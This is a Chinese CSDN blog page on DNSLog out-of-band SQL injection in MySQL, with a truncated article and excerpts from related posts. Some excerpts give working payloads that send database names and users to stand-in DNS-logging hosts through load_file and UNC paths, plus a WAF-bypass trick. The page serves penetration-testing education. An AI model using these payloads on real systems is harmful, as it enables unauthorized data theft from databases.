mysql-dnslog注入

DNSLog在SQL注入中的应用
最新推荐文章于 2022-08-07 21:23:08 发布
原创 最新推荐文章于 2022-08-07 21:23:08 发布 · 2k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#信息安全 #安全漏洞

本文详细介绍了DNSLog在SQL注入攻击中的运用原理及实战技巧,尤其针对MySQL环境下利用DNSLog绕过盲注限制,高效获取数据库信息的方法。通过UNC路径特性,文章展示了如何构造payload来查询数据库名、表名、列名及具体数据。

@Adminxe

http://ceye.io/   //dnslog注入平台

dnslog原理简介:

  简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。 对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设备的防护,Dnslog盲注可以减少发送的请求,直接回显数据实现注入。

mysql下的dnslog注入:

利用条件:secure_file_priv 不能为NULL,仅支持 Windows但不支持 Linux ,原因如下:

load_file函数在Linux下是无法用来做dnslog攻击的,因为在这里就涉及到Windows的一个小Tips——UNC路径。

UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。

因为Linux没有UNC路径这个东西,所以当MySQL处于Linux系统中的时候,是不能使用这种方式外带数据的

1.show variables like ‘%secure%’;    &

最低0.47元/天 解锁文章
MySQL-DNS注入
weixin_45634365的博客
03-03 345
一、DNS注入的原理 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,将盲注变为显错注入 即读取远程共享文件,拼接出函数,进行查询,再拼接到域名中,访问时将访问服务器,记录后查看日志 对于sql盲注,常见的方法是使用二分法一个个猜,但是这样的方法很麻烦,还很容易因为数据请求频繁导致被禁 所以可以将查询到的数据发送给一个URL,利用DNS解析产生的记录日志
SQL注入--DNSlog外带注入--理论
m0_56019217的博客
11-23 1185
DNS的作用是将域名解析为IP而DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名访问信息。可以理解为DNS服务器上的日志文件。比如,以点为分隔,从右向左依次是顶级域名、二级域名、三级域名。即,net是顶级域名,csdn是二级域名,blog是三级域名。域名不区分大小写。在进行ping命令时会使用DNS解析:这里就是被解析后,与csdn.com进行了拼接,然后再去执行Ping命令。这里我们界面就回显得到了,也就是得到了的值。这个过程就可以被称为DNSlog外带。
mysql dnslog_mysql-dnslog注入
weixin_39836751的博客
01-19 320
@Adminxednslog原理简介:简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设备的防护,Dnslog盲注可以减少发送的请求,直接回显数据实现注入mysql下的...
MySQL注入-Dns_log注入
m0_51313985的博客
05-18 349
在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被Ban 所以可以将select到的数据发送给一个url,利用dns解析 产生的记录日志来查看数据。 Dns-log =>DNS域名解析协议=>将域名转化为IP log=>日志(记录的东西) Dns的日志 外带数据(oob)–>这里是一个延时盲注 我让数据库去访问某个网站
mysql注入---DNSLOG注入
nini_boom的博客
07-21 644
不一定学习进度速度快,就代表掌控的东西就多。学习的目标在于对于理解的知识深度和广度,速度快会有很多时间学习广度的东西,但在有限广度的情况下,理解的深度才是更重要的,所以在这种情况下,不要在意学习的进度,把握住学习的节奏,向更深处理解。扎下深根的竹子,在疯狂生长的时候才有更多的后备力量。 0x01 DNSLOG注入 当我们遇到了盲注、延时注入时,页面没有具体的返回。 但是盲注、延时注入需要进行大...
MYSQL--Dns注入
qq_68233961的博客
08-07 1219
MYSQL--Dns注入
特别的sql注入方式-DNSlog注入--安鸾靶场练习 DNSlog注入学习
AAAAAAAAAAAA66的博客
01-05 2395
DNSlog注入 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 利用的场景 存在sql注入 无法获得回显 对目标网站可以发起请求 简单的来说就是可以利用 load_file() 函数,在存在注入的情况下将数据库中的信息带出我们的域名日志中(dnslog).详细的可以看下方链接 DNSLogMySQL注入
84.网络安全渗透测试—[SQL注入篇23]—[高级注入技巧-dnslog无回显注入]
qwsn
01-21 4619
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、高级注入技巧 dnslog无回显注入 1、原理 2、dnslog平台 3、MySQL dnslog无回显注入示例: 4、SQLSERVER dnslog无回显注入示例: 5、总结:
https防止注入_数据库DNSLog外带注入总结
weixin_39553600的博客
11-20 688
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等...
mysql注入之dns注入
seek_2022的博客
05-03 2595
文章目录一、DNS-LOG使用(域名解析日志)(一)DNS简介(二)LOG日志是怎么产生的?(三)DNS-LOG在渗透测试中的应用二、DNS注入相关知识回顾(一)load_file() 读取文件(二)UNC路径(三)绕靶场WAF三、DNS注入靶场实战(一)判断SQL注入(一)绕靶场WAF(二)查询库名(三)查询表名(四)查询字段名(五)查询并提交flag四、小结 一、DNS-LOG使用(域名解析日志) (一)DNS简介 DNS(域名解析)是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一
DNSlog实现Mysql注入
weixin_30883777的博客
03-22 323
step1: 通过DNSlog盲注需要用到load_file()函数。show variables like '%secure%' 查看load_file()可以读取的磁盘。 1、当secure_file_priv为空,就可以读取磁盘的目录。 2、当secure_file_priv为G:\,就可以读取G盘的文件。 3、当secure_file_priv为null,load_file就不...
MySQL_DNS注入
Mr.Huang_的博客
09-06 237
一、DNSLOG的使用场景 DNS log 【DNS日志注入】 DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 日志 => 日记 - 记录操作、记录访问的文件 DNS日志 => 某时某分谁谁谁请求我查某某域名 如果我们搭建一个DNS服务器来承接域名解析。所有的访问域名都会被我们的日志记录下来 域名 => 由运营商解析。 修改域名的设置方法,强行执行某个Ip去解析域名 NS记录 固定的域名 由固定的DNS服务器解析 DNS注入的核心,将盲注转化为显错注入 DNS协议
Mysql注入——DNS注入
m0_55854679的博客
02-17 2226
DNSlog【解决繁琐的盲注】介绍 DNS => 域名解析 LOG => 日志 dns-log => 域名解析日志【记录别人来查询域名和ip的对应】 DNSlog使用场景 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban,所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 DNS
16、Mysql - dns注入
songling515010475的专栏
05-22 245
为什么load_file能执行? 因为在mysql配置文件里开启了secure_file_priv服务,导致不对mysql的导入导出不做任何限制。 1.前往dnslog.cn申请一个域名 2.防止被WAF拦截,所以在后面拼接/123.txt?id=123当作参数,因为.txt会被WAF认为txt是不能传参数的,是安全的。申请的域名,前面要加三级域名,后面也要加路径,否则不会生效。 /123.txt?id=123 and load_file(concat('//',(select database
mysql——DNS注入
qq_45300786的博客
08-09 1888
DNS log 【DNS日志注入】 DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 DNS注入的核心,将盲注转化为显错注入 DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 比如 ox.qidao.com => DNS记录了这个请求, 那么我们也可以让mysql也能发出请求,DNS也会记录 ...
mysql dns 注入_DNSlog应用
weixin_36296215的博客
01-27 294
————背景说明————在做渗透的时候,有一些漏洞发现无回显的,比如sql注入,一般当我们拿到一个无回显的注入,那么我们往往会采用盲注,使用二分法不断猜测字符等方式来取信息,不过这样的方式耗时又费力,而且频繁地测试容易被目标网站ban掉。那么面对盲注,或者是其他漏洞的盲打,有没有哪种方法,可以快速地获取我们需要的信息呢,答案是有的,即本篇主要说的,利用DNS快速获取数据,官方地讲即DNSlog。这...
MySQL注入 — Dns 注入
hackzkaq的博客
12-03 265
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 DNS注入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 DNS注入利用的场景 在无法直接利用的情况下,但是可以通过DNS请求,通过DNSlog,把数据外带,用DNS解析记录查看。 DNSLOG的使用场景 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时
mysql数据库中的骚姿势-dnslog注入原理
m0_46304840的博客
05-27 2534
前言 我以为我写过dns注入了,结果我心血来潮看看博客,发现我居然还没有写 那么我就写一下 0x01.Dns注入原理 什么是dns? 例子:我们去访问 www.baidu.com,这时候dns会吧 www.baidu.com 这个域名转换为 IP地址 Dns其实就是负责把域名转换为IP地址 如果还不懂的话点击 点击这里查看 Dns在域名解析时会留下域名和解析ip的记录,利用这点我们可以使用Dnslog(日志)记录显示我们的 注入结果 dnslog注入原理 通过子查询,将内容拼接到域名内,让load_f
使用dnslog进行sql注入
CPriLuke的博客
07-12 833
这里主要是补充一下ADO老师在对dnslog进行注入前,对于dnslog的补充说明: 首先登陆http://ceye.io/注册一个账号,并进行登录,登录后在http://ceye.io/profile获取你的域名和token. 测试自己的dnslog是否正常, 直接在网页发送http: 在dnslog的http请求下查询是否存在有该记录: ...
DNSLOG注入常用语句
最新发布
03-31
### 关于DNSLOG注入的常用Payload 在SQL盲注场景下,DNSLog注入是一种常见的技术手段,它可以通过`load_file()`函数或其他方式触发DNS解析请求,并将目标数据发送至指定的DNSLog平台。以下是几种常用的DNSLog注入Payload示例: #### Payload 示例 1:基于 `load_file()` 通过调用MySQL中的`load_file()`函数加载远程文件路径的方式,可以构造如下Payload: ```sql ' UNION SELECT LOAD_FILE(CONCAT('\\\\', (SELECT database()), '.example.com\\')) -- ``` 此语句的作用是尝试从当前数据库名称拼接成一个完整的UNC路径并触发DNS查询[^3]。 #### Payload 示例 2:基于字符串拼接 另一种常见方法是直接使用字符串拼接功能构建子域部分,从而向外部DNS服务器发起请求。例如,在支持字符串连接运算符的情况下可写为: ```sql ' AND (SELECT CASE WHEN (1=1) THEN CONCAT_WS('.',database(),'zone.dnslog.example') ELSE '' END) INTO OUTFILE '/tmp/test.txt' ``` #### Payload 示例 3:动态执行命令 如果环境允许执行存储过程或者动态SQL,则还可以进一步扩展复杂度较高的攻击载荷。下面是一个简单的例子展示如何创建临时表并通过其内容生成自定义域名请求: ```sql CREATE TEMPORARY TABLE temp_dns(id INT, data VARCHAR(255)); INSERT INTO temp_dns VALUES(1,(SELECT user())); SELECT CONCAT((SELECT data FROM temp_dns WHERE id=1),'.subdomain.ceye.io.') AS result; DROP TABLE IF EXISTS temp_dns; ``` 以上每种形式都依赖具体的应用程序逻辑以及后台所使用的DBMS特性而有所不同;实际应用过程中需根据实际情况调整语法结构以适配不同类型的漏洞特征[^4]。 ### 注意事项 - 使用上述任何一种payload之前,请确保已获得合法授权来进行此类测试活动。 - 测试完成后应及时清理产生的中间状态(如临时表格),以免影响正常业务运行。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值